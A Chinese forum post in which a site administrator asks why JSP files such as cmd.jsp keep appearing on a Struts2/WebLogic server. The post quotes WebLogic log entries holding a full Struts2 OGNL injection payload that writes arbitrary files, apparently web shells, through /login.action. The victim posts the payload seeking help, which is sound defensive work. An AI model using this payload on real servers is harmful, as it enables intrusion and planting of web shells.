我们的网站 受到了如下攻击 这个怎么解决 有人帮帮忙
项目是后台SSH2 前台是extjs web容器:weblogic11
在主页下面 莫名写入了许多JSP 文件 cmd.jsp file.jsp test.jsp
怎么防止 攻击 这个是属于那种攻击呢?? 是不是sql注入
查看weblogic日志 发现:
10.1.1.8 - - [29/七月/2013:15:51:57 +0800] "POST /login.action?('%5Cu0023_memberAccess%5B%
5C'allowStaticMethodAccess%5C'%5D')(meh)=true&(aaa)(('%5Cu0023context%5B%
5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5Cu003d%5Cu0023foo')(%5Cu0023foo%
5Cu003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('%5C43req%
5C75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('%5C43fos%5C75new%
5C40java.io.FileOutputStream(%5C43req.getParameter(%22path%22))')(d))&(i3)(('%5C43fos.write
(%5C43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('%5C43fos.close()')(d)) HTTP/1.1" 200
12665
10.1.1.8 - - [29/七月/2013:15:59:00 +0800] "POST /login.action?('%5Cu0023_memberAccess%5B%5C'allowStaticMethodAccess%5C'%5D')(meh)=true&(aaa)(('%5Cu0023context%5B%5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5Cu003d%5Cu0023foo')(%5Cu0023foo%5Cu003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('%5C43fos%5C75new%5C40java.io.FileOutputStream(%5C43req.getParameter(%22path%22))')(d))&(i3)(('%5C43fos.write(%5C43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('%5C43fos.close()')(d)) HTTP/1.1" 200 12665